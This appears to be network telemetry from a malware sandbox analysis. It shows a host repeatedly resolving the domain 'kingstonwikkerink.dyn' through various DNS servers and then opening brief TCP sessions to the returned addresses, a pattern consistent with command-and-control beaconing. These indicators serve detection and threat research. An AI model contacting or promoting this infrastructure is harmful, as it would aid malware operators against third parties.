                                                                                      Nov 1, 2024 08:48:30.121205091 CET1303544588213.182.204.57192.168.2.23
                                                                                      Nov 1, 2024 08:48:30.121227026 CET1303544588213.182.204.57192.168.2.23
                                                                                      Nov 1, 2024 08:48:30.121498108 CET4458813035192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:48:30.121499062 CET4458813035192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:48:30.121623993 CET4458813035192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:48:31.537456036 CET4251680192.168.2.23109.202.202.202
                                                                                      Nov 1, 2024 08:48:45.151818991 CET4340013493192.168.2.2388.151.195.22
                                                                                      Nov 1, 2024 08:48:45.156650066 CET134934340088.151.195.22192.168.2.23
                                                                                      Nov 1, 2024 08:48:45.156775951 CET4340013493192.168.2.2388.151.195.22
                                                                                      Nov 1, 2024 08:48:45.156816006 CET4340013493192.168.2.2388.151.195.22
                                                                                      Nov 1, 2024 08:48:45.161679983 CET134934340088.151.195.22192.168.2.23
                                                                                      Nov 1, 2024 08:48:45.161752939 CET4340013493192.168.2.2388.151.195.22
                                                                                      Nov 1, 2024 08:48:45.166548967 CET134934340088.151.195.22192.168.2.23
                                                                                      Nov 1, 2024 08:48:46.266041040 CET134934340088.151.195.22192.168.2.23
                                                                                      Nov 1, 2024 08:48:46.266396999 CET4340013493192.168.2.2388.151.195.22
                                                                                      Nov 1, 2024 08:48:46.266444921 CET134934340088.151.195.22192.168.2.23
                                                                                      Nov 1, 2024 08:48:46.266477108 CET4340013493192.168.2.2388.151.195.22
                                                                                      Nov 1, 2024 08:48:46.266534090 CET4340013493192.168.2.2388.151.195.22
                                                                                      Nov 1, 2024 08:48:51.297586918 CET4312210159192.168.2.2331.13.248.89
                                                                                      Nov 1, 2024 08:48:51.302469969 CET101594312231.13.248.89192.168.2.23
                                                                                      Nov 1, 2024 08:48:51.302577019 CET4312210159192.168.2.2331.13.248.89
                                                                                      Nov 1, 2024 08:48:51.302577019 CET4312210159192.168.2.2331.13.248.89
                                                                                      Nov 1, 2024 08:48:51.307410002 CET101594312231.13.248.89192.168.2.23
                                                                                      Nov 1, 2024 08:48:51.307487965 CET4312210159192.168.2.2331.13.248.89
                                                                                      Nov 1, 2024 08:48:51.312309027 CET101594312231.13.248.89192.168.2.23
                                                                                      Nov 1, 2024 08:48:52.397416115 CET101594312231.13.248.89192.168.2.23
                                                                                      Nov 1, 2024 08:48:52.397509098 CET101594312231.13.248.89192.168.2.23
                                                                                      Nov 1, 2024 08:48:52.397650003 CET4312210159192.168.2.2331.13.248.89
                                                                                      Nov 1, 2024 08:48:52.397650003 CET4312210159192.168.2.2331.13.248.89
                                                                                      Nov 1, 2024 08:48:52.397738934 CET4312210159192.168.2.2331.13.248.89
                                                                                      Nov 1, 2024 08:48:58.157773972 CET43928443192.168.2.2391.189.91.42
                                                                                      Nov 1, 2024 08:49:02.417895079 CET375889334192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:49:02.423104048 CET933437588213.182.204.57192.168.2.23
                                                                                      Nov 1, 2024 08:49:02.423217058 CET375889334192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:49:02.423270941 CET375889334192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:49:02.428050041 CET933437588213.182.204.57192.168.2.23
                                                                                      Nov 1, 2024 08:49:02.428123951 CET375889334192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:49:02.432934046 CET933437588213.182.204.57192.168.2.23
                                                                                      Nov 1, 2024 08:49:03.399930954 CET933437588213.182.204.57192.168.2.23
                                                                                      Nov 1, 2024 08:49:03.399945974 CET933437588213.182.204.57192.168.2.23
                                                                                      Nov 1, 2024 08:49:03.399955034 CET933437588213.182.204.57192.168.2.23
                                                                                      Nov 1, 2024 08:49:03.400079966 CET933437588213.182.204.57192.168.2.23
                                                                                      Nov 1, 2024 08:49:03.400152922 CET375889334192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:49:03.400273085 CET375889334192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:49:03.400273085 CET375889334192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:49:03.400273085 CET375889334192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:49:03.400273085 CET375889334192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:49:08.414446115 CET5346420344192.168.2.2391.149.238.18
                                                                                      Nov 1, 2024 08:49:08.419363022 CET203445346491.149.238.18192.168.2.23
                                                                                      Nov 1, 2024 08:49:08.419465065 CET5346420344192.168.2.2391.149.238.18
                                                                                      Nov 1, 2024 08:49:08.419504881 CET5346420344192.168.2.2391.149.238.18
                                                                                      Nov 1, 2024 08:49:08.424338102 CET203445346491.149.238.18192.168.2.23
                                                                                      Nov 1, 2024 08:49:08.424416065 CET5346420344192.168.2.2391.149.238.18
                                                                                      Nov 1, 2024 08:49:08.429193974 CET203445346491.149.238.18192.168.2.23
                                                                                      Nov 1, 2024 08:49:09.360860109 CET203445346491.149.238.18192.168.2.23
                                                                                      Nov 1, 2024 08:49:09.360872984 CET203445346491.149.238.18192.168.2.23
                                                                                      Nov 1, 2024 08:49:09.361041069 CET5346420344192.168.2.2391.149.238.18
                                                                                      Nov 1, 2024 08:49:09.361041069 CET5346420344192.168.2.2391.149.238.18
                                                                                      Nov 1, 2024 08:49:09.361134052 CET5346420344192.168.2.2391.149.238.18
                                                                                      Nov 1, 2024 08:49:09.361314058 CET203445346491.149.238.18192.168.2.23
                                                                                      Nov 1, 2024 08:49:09.361393929 CET5346420344192.168.2.2391.149.238.18
                                                                                      Nov 1, 2024 08:49:09.361418009 CET203445346491.149.238.18192.168.2.23
                                                                                      Nov 1, 2024 08:49:09.361572027 CET5346420344192.168.2.2391.149.238.18
                                                                                      Nov 1, 2024 08:49:24.385456085 CET3652413433192.168.2.2381.29.149.178
                                                                                      Nov 1, 2024 08:49:24.390669107 CET134333652481.29.149.178192.168.2.23
                                                                                      Nov 1, 2024 08:49:24.390733957 CET3652413433192.168.2.2381.29.149.178
                                                                                      Nov 1, 2024 08:49:24.390733957 CET3652413433192.168.2.2381.29.149.178
                                                                                      Nov 1, 2024 08:49:24.398861885 CET134333652481.29.149.178192.168.2.23
                                                                                      Nov 1, 2024 08:49:24.398930073 CET3652413433192.168.2.2381.29.149.178
                                                                                      Nov 1, 2024 08:49:24.404095888 CET134333652481.29.149.178192.168.2.23
                                                                                      Nov 1, 2024 08:49:25.412257910 CET134333652481.29.149.178192.168.2.23
                                                                                      Nov 1, 2024 08:49:25.412275076 CET134333652481.29.149.178192.168.2.23
                                                                                      Nov 1, 2024 08:49:25.412571907 CET3652413433192.168.2.2381.29.149.178
                                                                                      Nov 1, 2024 08:49:25.412571907 CET3652413433192.168.2.2381.29.149.178
                                                                                      Nov 1, 2024 08:49:25.412666082 CET3652413433192.168.2.2381.29.149.178
                                                                                      Nov 1, 2024 08:49:35.455919981 CET4032817669192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:49:35.460846901 CET1766940328193.233.193.45192.168.2.23
                                                                                      Nov 1, 2024 08:49:35.460900068 CET4032817669192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:49:35.460922003 CET4032817669192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:49:35.466166973 CET1766940328193.233.193.45192.168.2.23
                                                                                      Nov 1, 2024 08:49:35.466211081 CET4032817669192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:49:35.471088886 CET1766940328193.233.193.45192.168.2.23
                                                                                      Nov 1, 2024 08:49:36.817918062 CET1766940328193.233.193.45192.168.2.23
                                                                                      Nov 1, 2024 08:49:36.817933083 CET1766940328193.233.193.45192.168.2.23
                                                                                      Nov 1, 2024 08:49:36.817941904 CET1766940328193.233.193.45192.168.2.23
                                                                                      Nov 1, 2024 08:49:36.818104982 CET4032817669192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:49:36.818104982 CET4032817669192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:49:36.818105936 CET4032817669192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:49:36.818212032 CET4032817669192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:49:36.818269968 CET1766940328193.233.193.45192.168.2.23
                                                                                      Nov 1, 2024 08:49:36.818352938 CET4032817669192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:49:41.837212086 CET4563811838192.168.2.2381.29.149.178
                                                                                      Nov 1, 2024 08:49:41.842088938 CET118384563881.29.149.178192.168.2.23
                                                                                      Nov 1, 2024 08:49:41.842185974 CET4563811838192.168.2.2381.29.149.178
                                                                                      Nov 1, 2024 08:49:41.842269897 CET4563811838192.168.2.2381.29.149.178
                                                                                      Nov 1, 2024 08:49:41.847080946 CET118384563881.29.149.178192.168.2.23
                                                                                      Nov 1, 2024 08:49:41.847170115 CET4563811838192.168.2.2381.29.149.178
                                                                                      Nov 1, 2024 08:49:41.851964951 CET118384563881.29.149.178192.168.2.23
                                                                                      Nov 1, 2024 08:49:42.857985020 CET118384563881.29.149.178192.168.2.23
                                                                                      Nov 1, 2024 08:49:42.858004093 CET118384563881.29.149.178192.168.2.23
                                                                                      Nov 1, 2024 08:49:42.858222008 CET4563811838192.168.2.2381.29.149.178
                                                                                      Nov 1, 2024 08:49:42.858222008 CET4563811838192.168.2.2381.29.149.178
                                                                                      Nov 1, 2024 08:49:42.858263016 CET4563811838192.168.2.2381.29.149.178
                                                                                      Nov 1, 2024 08:49:52.883088112 CET388827562192.168.2.23217.28.130.41
                                                                                      Nov 1, 2024 08:49:52.887919903 CET756238882217.28.130.41192.168.2.23
                                                                                      Nov 1, 2024 08:49:52.887984037 CET388827562192.168.2.23217.28.130.41
                                                                                      Nov 1, 2024 08:49:52.888022900 CET388827562192.168.2.23217.28.130.41
                                                                                      Nov 1, 2024 08:49:52.892976046 CET756238882217.28.130.41192.168.2.23
                                                                                      Nov 1, 2024 08:49:52.893029928 CET388827562192.168.2.23217.28.130.41
                                                                                      Nov 1, 2024 08:49:52.897839069 CET756238882217.28.130.41192.168.2.23
                                                                                      Nov 1, 2024 08:49:53.563555956 CET756238882217.28.130.41192.168.2.23
                                                                                      Nov 1, 2024 08:49:53.563571930 CET756238882217.28.130.41192.168.2.23
                                                                                      Nov 1, 2024 08:49:53.563738108 CET388827562192.168.2.23217.28.130.41
                                                                                      Nov 1, 2024 08:49:53.563739061 CET388827562192.168.2.23217.28.130.41
                                                                                      Nov 1, 2024 08:49:53.563832045 CET388827562192.168.2.23217.28.130.41
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 1, 2024 08:47:55.607145071 CET4614553192.168.2.2381.169.136.222
                                                                                      Nov 1, 2024 08:47:55.635098934 CET534614581.169.136.222192.168.2.23
                                                                                      Nov 1, 2024 08:47:55.740808010 CET3590853192.168.2.2381.169.136.222
                                                                                      Nov 1, 2024 08:47:55.769931078 CET533590881.169.136.222192.168.2.23
                                                                                      Nov 1, 2024 08:47:55.789309025 CET4147553192.168.2.23202.61.197.122
                                                                                      Nov 1, 2024 08:47:55.799746037 CET5341475202.61.197.122192.168.2.23
                                                                                      Nov 1, 2024 08:47:55.800632954 CET3867053192.168.2.23194.36.144.87
                                                                                      Nov 1, 2024 08:47:55.810625076 CET5338670194.36.144.87192.168.2.23
                                                                                      Nov 1, 2024 08:48:01.754442930 CET4801753192.168.2.2381.169.136.222
                                                                                      Nov 1, 2024 08:48:01.784405947 CET534801781.169.136.222192.168.2.23
                                                                                      Nov 1, 2024 08:48:08.113596916 CET4173453192.168.2.235.161.109.23
                                                                                      Nov 1, 2024 08:48:13.120079041 CET5107853192.168.2.2380.152.203.134
                                                                                      Nov 1, 2024 08:48:18.125916004 CET4723753192.168.2.23139.84.165.176
                                                                                      Nov 1, 2024 08:48:23.131730080 CET4005753192.168.2.23185.181.61.24
                                                                                      Nov 1, 2024 08:48:23.165889025 CET5340057185.181.61.24192.168.2.23
                                                                                      Nov 1, 2024 08:48:29.129530907 CET5392553192.168.2.23194.36.144.87
                                                                                      Nov 1, 2024 08:48:29.139676094 CET5353925194.36.144.87192.168.2.23
                                                                                      Nov 1, 2024 08:48:35.123776913 CET4281753192.168.2.23137.220.52.23
                                                                                      Nov 1, 2024 08:48:40.129369020 CET3345753192.168.2.235.161.109.23
                                                                                      Nov 1, 2024 08:48:45.135284901 CET3338653192.168.2.2351.158.108.203
                                                                                      Nov 1, 2024 08:48:45.150994062 CET533338651.158.108.203192.168.2.23
                                                                                      Nov 1, 2024 08:48:51.269552946 CET5764753192.168.2.23217.160.70.42
                                                                                      Nov 1, 2024 08:48:51.296627045 CET5357647217.160.70.42192.168.2.23
                                                                                      Nov 1, 2024 08:48:57.400353909 CET5408553192.168.2.2380.152.203.134
                                                                                      Nov 1, 2024 08:49:02.406711102 CET3351553192.168.2.23194.36.144.87
                                                                                      Nov 1, 2024 08:49:02.417062998 CET5333515194.36.144.87192.168.2.23
                                                                                      Nov 1, 2024 08:49:08.403342962 CET4299553192.168.2.23152.53.15.127
                                                                                      Nov 1, 2024 08:49:08.413713932 CET5342995152.53.15.127192.168.2.23
                                                                                      Nov 1, 2024 08:49:14.364183903 CET4055153192.168.2.2364.176.6.48
                                                                                      Nov 1, 2024 08:49:19.370321989 CET5790153192.168.2.23139.84.165.176
                                                                                      Nov 1, 2024 08:49:24.374563932 CET3423253192.168.2.23152.53.15.127
                                                                                      Nov 1, 2024 08:49:24.384902954 CET5334232152.53.15.127192.168.2.23
                                                                                      Nov 1, 2024 08:49:30.415898085 CET3353553192.168.2.23178.254.22.166
                                                                                      Nov 1, 2024 08:49:35.421952009 CET5778053192.168.2.23185.181.61.24
                                                                                      Nov 1, 2024 08:49:35.455372095 CET5357780185.181.61.24192.168.2.23
                                                                                      Nov 1, 2024 08:49:41.820888042 CET5785053192.168.2.2351.158.108.203
                                                                                      Nov 1, 2024 08:49:41.836503029 CET535785051.158.108.203192.168.2.23
                                                                                      Nov 1, 2024 08:49:47.861330032 CET3958553192.168.2.2370.34.254.19
                                                                                      Nov 1, 2024 08:49:52.867062092 CET4423753192.168.2.2351.158.108.203
                                                                                      Nov 1, 2024 08:49:52.882540941 CET534423751.158.108.203192.168.2.23
                                                                                      Nov 1, 2024 08:49:58.566718102 CET4365653192.168.2.2370.34.254.19
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Nov 1, 2024 08:47:55.607145071 CET192.168.2.2381.169.136.2220x61c3Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:01.754442930 CET192.168.2.2381.169.136.2220x7ccbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:08.113596916 CET192.168.2.235.161.109.230x94f6Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:13.120079041 CET192.168.2.2380.152.203.1340x471dStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:18.125916004 CET192.168.2.23139.84.165.1760x723fStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:23.131730080 CET192.168.2.23185.181.61.240xbbfStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:29.129530907 CET192.168.2.23194.36.144.870xa446Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:35.123776913 CET192.168.2.23137.220.52.230xb5dStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:40.129369020 CET192.168.2.235.161.109.230x1404Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:45.135284901 CET192.168.2.2351.158.108.2030x9cd0Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:51.269552946 CET192.168.2.23217.160.70.420x4c73Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:57.400353909 CET192.168.2.2380.152.203.1340xa867Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:02.406711102 CET192.168.2.23194.36.144.870xefcaStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:08.403342962 CET192.168.2.23152.53.15.1270xd151Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:14.364183903 CET192.168.2.2364.176.6.480xfa02Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:19.370321989 CET192.168.2.23139.84.165.1760x3259Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:24.374563932 CET192.168.2.23152.53.15.1270x9421Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:30.415898085 CET192.168.2.23178.254.22.1660x9973Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:35.421952009 CET192.168.2.23185.181.61.240x1288Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:41.820888042 CET192.168.2.2351.158.108.2030xf703Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:47.861330032 CET192.168.2.2370.34.254.190x8635Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:52.867062092 CET192.168.2.2351.158.108.2030x1139Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:58.566718102 CET192.168.2.2370.34.254.190x880aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Nov 1, 2024 08:47:55.635098934 CET81.169.136.222192.168.2.230x61c3No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:47:55.635098934 CET81.169.136.222192.168.2.230x61c3No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:47:55.635098934 CET81.169.136.222192.168.2.230x61c3No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:47:55.635098934 CET81.169.136.222192.168.2.230x61c3No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:47:55.635098934 CET81.169.136.222192.168.2.230x61c3No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:47:55.635098934 CET81.169.136.222192.168.2.230x61c3No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:47:55.635098934 CET81.169.136.222192.168.2.230x61c3No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:47:55.635098934 CET81.169.136.222192.168.2.230x61c3No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:47:55.635098934 CET81.169.136.222192.168.2.230x61c3No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:47:55.769931078 CET81.169.136.222192.168.2.230x61c3Format error (1)kingstonwikkerink.dynnonenoneA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:47:55.799746037 CET202.61.197.122192.168.2.230xeafFormat error (1)kingstonwikkerink.dynnonenoneA (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:01.784405947 CET81.169.136.222192.168.2.230x7ccbNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:01.784405947 CET81.169.136.222192.168.2.230x7ccbNo error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:01.784405947 CET81.169.136.222192.168.2.230x7ccbNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:01.784405947 CET81.169.136.222192.168.2.230x7ccbNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:01.784405947 CET81.169.136.222192.168.2.230x7ccbNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:01.784405947 CET81.169.136.222192.168.2.230x7ccbNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:01.784405947 CET81.169.136.222192.168.2.230x7ccbNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:01.784405947 CET81.169.136.222192.168.2.230x7ccbNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:01.784405947 CET81.169.136.222192.168.2.230x7ccbNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:23.165889025 CET185.181.61.24192.168.2.230xbbfNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:23.165889025 CET185.181.61.24192.168.2.230xbbfNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:23.165889025 CET185.181.61.24192.168.2.230xbbfNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:23.165889025 CET185.181.61.24192.168.2.230xbbfNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:23.165889025 CET185.181.61.24192.168.2.230xbbfNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:23.165889025 CET185.181.61.24192.168.2.230xbbfNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:23.165889025 CET185.181.61.24192.168.2.230xbbfNo error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:23.165889025 CET185.181.61.24192.168.2.230xbbfNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:23.165889025 CET185.181.61.24192.168.2.230xbbfNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:29.139676094 CET194.36.144.87192.168.2.230xa446No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:29.139676094 CET194.36.144.87192.168.2.230xa446No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:29.139676094 CET194.36.144.87192.168.2.230xa446No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:29.139676094 CET194.36.144.87192.168.2.230xa446No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:29.139676094 CET194.36.144.87192.168.2.230xa446No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:29.139676094 CET194.36.144.87192.168.2.230xa446No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:29.139676094 CET194.36.144.87192.168.2.230xa446No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:29.139676094 CET194.36.144.87192.168.2.230xa446No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:29.139676094 CET194.36.144.87192.168.2.230xa446No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:45.150994062 CET51.158.108.203192.168.2.230x9cd0No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:45.150994062 CET51.158.108.203192.168.2.230x9cd0No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:45.150994062 CET51.158.108.203192.168.2.230x9cd0No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:45.150994062 CET51.158.108.203192.168.2.230x9cd0No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:45.150994062 CET51.158.108.203192.168.2.230x9cd0No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:45.150994062 CET51.158.108.203192.168.2.230x9cd0No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:45.150994062 CET51.158.108.203192.168.2.230x9cd0No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:45.150994062 CET51.158.108.203192.168.2.230x9cd0No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:45.150994062 CET51.158.108.203192.168.2.230x9cd0No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:51.296627045 CET217.160.70.42192.168.2.230x4c73No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:51.296627045 CET217.160.70.42192.168.2.230x4c73No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:51.296627045 CET217.160.70.42192.168.2.230x4c73No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:51.296627045 CET217.160.70.42192.168.2.230x4c73No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:51.296627045 CET217.160.70.42192.168.2.230x4c73No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:51.296627045 CET217.160.70.42192.168.2.230x4c73No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:51.296627045 CET217.160.70.42192.168.2.230x4c73No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:51.296627045 CET217.160.70.42192.168.2.230x4c73No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:48:51.296627045 CET217.160.70.42192.168.2.230x4c73No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:02.417062998 CET194.36.144.87192.168.2.230xefcaNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:02.417062998 CET194.36.144.87192.168.2.230xefcaNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:02.417062998 CET194.36.144.87192.168.2.230xefcaNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:02.417062998 CET194.36.144.87192.168.2.230xefcaNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:02.417062998 CET194.36.144.87192.168.2.230xefcaNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:02.417062998 CET194.36.144.87192.168.2.230xefcaNo error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:02.417062998 CET194.36.144.87192.168.2.230xefcaNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:02.417062998 CET194.36.144.87192.168.2.230xefcaNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:02.417062998 CET194.36.144.87192.168.2.230xefcaNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:08.413713932 CET152.53.15.127192.168.2.230xd151No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
